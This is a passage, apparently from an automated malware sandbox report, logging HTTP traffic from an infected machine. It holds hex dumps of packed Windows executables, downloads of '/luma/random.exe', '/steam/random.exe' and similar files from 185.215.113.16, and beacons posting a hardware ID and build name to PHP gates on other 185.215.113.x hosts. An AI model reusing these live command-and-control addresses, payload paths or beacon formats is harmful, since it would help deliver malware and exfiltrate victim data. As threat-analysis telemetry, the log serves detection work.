00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 07:08:39 GMTContent-Type: application/octet-streamContent-Length: 1854464Last-Modified: Thu, 24 Oct 2024 06:55:17 GMTConnection: keep-aliveETag: "6719ef55-1c4c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 30 6a 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 6a 00 00 04 00 00 e7 22 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 79 76 71 7a 6b 75 6b 00 f0 19 00 00 30 50 00 00 ea 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 65 6a 72 67 6c 77 77 00 10 00 00 00 20 6a 00 00 04 00 00 00 26 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 6a 00 00 22 00 00 00 2a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 07:08:43 GMTContent-Type: application/octet-streamContent-Length: 2822656Last-Modified: Thu, 24 Oct 2024 06:45:04 GMTConnection: keep-aliveETag: "6719ecf0-2b1200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 05 dd 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 6a 6a 75 79 77 7a 71 00 c0 2a 00 00 a0 00 00 00 b2 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 75 63 63 61 70 6a 63 00 20 00 00 00 60 2b 00 00 04 00 00 00 ec 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 f0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 07:09:18 GMTContent-Type: application/octet-streamContent-Length: 1911296Last-Modified: Thu, 24 Oct 2024 06:55:23 GMTConnection: keep-aliveETag: "6719ef5b-1d2a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4b 00 00 04 00 00 a9 00 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec ae 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c ae 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 79 67 63 69 63 73 6d 00 10 1a 00 00 a0 31 00 00 10 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 79 78 6c 71 73 66 6d 00 10 00 00 00 b0 4b 00 00 04 00 00 00 04 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4b 00 00 22 00 00 00 08 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 07:09:20 GMTContent-Type: application/octet-streamContent-Length: 1854464Last-Modified: Thu, 24 Oct 2024 06:55:17 GMTConnection: keep-aliveETag: "6719ef55-1c4c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 30 6a 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 6a 00 00 04 00 00 e7 22 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 79 76 71 7a 6b 75 6b 00 f0 19 00 00 30 50 00 00 ea 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 65 6a 72 67 6c 77 77 00 10 00 00 00 20 6a 00 00 04 00 00 00 26 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 6a 00 00 22 00 00 00 2a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 07:09:21 GMTContent-Type: application/octet-streamContent-Length: 2822656Last-Modified: Thu, 24 Oct 2024 06:45:04 GMTConnection: keep-aliveETag: "6719ecf0-2b1200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 05 dd 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 6a 6a 75 79 77 7a 71 00 c0 2a 00 00 a0 00 00 00 b2 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 75 63 63 61 70 6a 63 00 20 00 00 00 60 2b 00 00 04 00 00 00 ec 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 f0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKJJECAEGCBGDHDHCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 31 42 41 30 44 38 46 42 46 37 33 38 39 37 32 35 30 38 33 31 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 4a 4a 45 43 41 45 47 43 42 47 44 48 44 48 43 2d 2d 0d 0a Data Ascii: ------AECAKJJECAEGCBGDHDHCContent-Disposition: form-data; name="hwid"E51BA0D8FBF73897250831------AECAKJJECAEGCBGDHDHCContent-Disposition: form-data; name="build"doma------AECAKJJECAEGCBGDHDHC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 31 32 42 37 34 42 37 35 38 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B12B74B75882D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 31 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001138001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 31 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001139001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKFBGIIIDGDGCFCGIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 31 42 41 30 44 38 46 42 46 37 33 38 39 37 32 35 30 38 33 31 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 4b 46 42 47 49 49 49 44 47 44 47 43 46 43 47 49 2d 2d 0d 0a Data Ascii: ------EBFBKFBGIIIDGDGCFCGIContent-Disposition: form-data; name="hwid"E51BA0D8FBF73897250831------EBFBKFBGIIIDGDGCFCGIContent-Disposition: form-data; name="build"doma------EBFBKFBGIIIDGDGCFCGI--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 31 34 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001140001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 35 31 42 41 30 44 38 46 42 46 37 33 38 39 37 32 35 30 38 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 2d 2d 0d 0a Data Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="hwid"E51BA0D8FBF73897250831------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="build"doma------FCAEBFIJKEBGHIDHIEGI--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 31 31 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1001141001&unit=246122658369
